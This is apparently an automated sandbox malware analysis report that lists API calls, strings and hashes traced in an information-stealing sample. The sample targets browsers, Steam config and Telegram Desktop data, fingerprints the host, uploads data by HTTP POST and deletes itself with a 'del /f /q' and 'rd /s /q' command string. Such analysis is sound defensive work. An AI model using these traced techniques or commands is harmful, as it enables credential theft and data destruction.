                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,?,?,00000000,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 004172E5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00418606), ref: 004172EC
                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00418606), ref: 0041730C
                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 004175AD
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 00417682
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 004176A6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402AA0: InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402AA0: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004132F0: StrCmpCA.SHLWAPI(00000000,block), ref: 00413315
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004132F0: ExitProcess.KERNEL32 ref: 0041331D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412C64
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412CA9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E440: StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,?,?,?,?), ref: 00417C10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412E50: strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412F60: strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416FC0: lstrlenA.KERNEL32(00000000), ref: 00417011
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00417C0B
                                                                                                                                                                                                                                                                                                  • C:\ProgramData\, xrefs: 0041756F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open$Internet$Heaplstrcatlstrcpylstrlenstrtok_s$Process$AllocCloseCreateDirectoryEvent$ConnectExitHandleHttpInformationNameOptionQueryRequestUserValueVolumeWindowswsprintf
                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$C:\ProgramData\
                                                                                                                                                                                                                                                                                                  • API String ID: 818183501-1067945926
                                                                                                                                                                                                                                                                                                  • Opcode ID: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                                  • Instruction ID: d3f20ebcfaa0f86e13ddee9407f56ad69643857b77905c87f50bde3cae6408d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C2A331C10B599BDB11EFB5C9815EEB378BF18308F00964EE85567142EB78BAC9CB94
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040E740
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,opera), ref: 0040E5B9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4E0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042150A,0042150A), ref: 0040B523
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E923
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\$chrome$firefox$opera
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-3146807071
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 22bc5863ea798df5109445d1e364a8a74c8a3d857c00c7bd5e27f083e93039e9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94429131D00B099BDB05EF75C981AEAB7B4FF18308F008159F9556B252EB38BAD5CB94
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:\$C
                                                                                                                                                                                                                                                                                                  • API String ID: 1059865016-545181305
                                                                                                                                                                                                                                                                                                  • Opcode ID: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                                  • Instruction ID: daccc5cf811b00eb36f485bb9bb5cfb034b4705064687d02f987ca2459062bbc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6141D4705083107BD301BB718C85BBF7AE99FC5784F00491EF58597291EBBC99829BAA
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041841D
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418444
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041854E
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00418573
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00418584
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$memset$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                                                  • API String ID: 86853776-1686486140
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7bf5b1220a567134bc8680c304d03b75e5346a68b302ecb6bd04b7556a355826
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3431B130B043446BE200AB6298D67BF77A69BD574CF00451EF4451A282DFBC6DC98B9B
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Desktop$CreateOpenSleeplstrcpymemcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                                  • API String ID: 3603158527-2020731023
                                                                                                                                                                                                                                                                                                  • Opcode ID: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                                  • Instruction ID: f2f5d87aafaa2d86ed8620da2dc3468a3bb05fc034b5e9ecb920fc18406a804c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56313771D04344ABDB21EB218D41BEFB774AF95304F00419EF90832192DB786AC5CBAA
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcatmemcmpstrlen$CloseFileFindFirstOpenQueryValuelstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: Software\Valve\Steam$SteamPath$\config\
                                                                                                                                                                                                                                                                                                  • API String ID: 393122709-2561568711
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 85194e8d5805dad303305febaf6046d54008d8169596ab7e5b376dc9a1cdcd29
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAC17131C107489ADB01EF64C9C15FA73B8AF6D318F019289FD496A017EB78BAD4CB94
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001A,?,00000104), ref: 00416367
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\Telegram Desktop\), ref: 00416376
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcatmemcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*$C:\ProgramData\$Soft$\Telegram Desktop\
                                                                                                                                                                                                                                                                                                  • API String ID: 2540414856-1297282028
                                                                                                                                                                                                                                                                                                  • Opcode ID: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                                  • Instruction ID: 64e18173e81040c63563a2c948d1254a8cd49f8bd4ee544822172e8b9e7dfe6d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09B19571810B4EA7DB00EF75C9858D9B768BF69308F40924AFD0952502EB78F6E8CBD4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00410B5E
                                                                                                                                                                                                                                                                                                  • ProcessorNameString, xrefs: 00410B7C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-2804670039
                                                                                                                                                                                                                                                                                                  • Opcode ID: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 414338a11f3689f75f6fdb63b0f136fa5a8568cc8c95f28b9b39ab38a5685d7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F08230784320BBD3106B24AC0AF5A7A99AB45B51F504029F685A71E1D6A06C508BD5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,0042150A,0042150A), ref: 00416C6A
                                                                                                                                                                                                                                                                                                  • strstr.MSVCRT ref: 00416C82
                                                                                                                                                                                                                                                                                                  • strstr.MSVCRT ref: 00416C94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
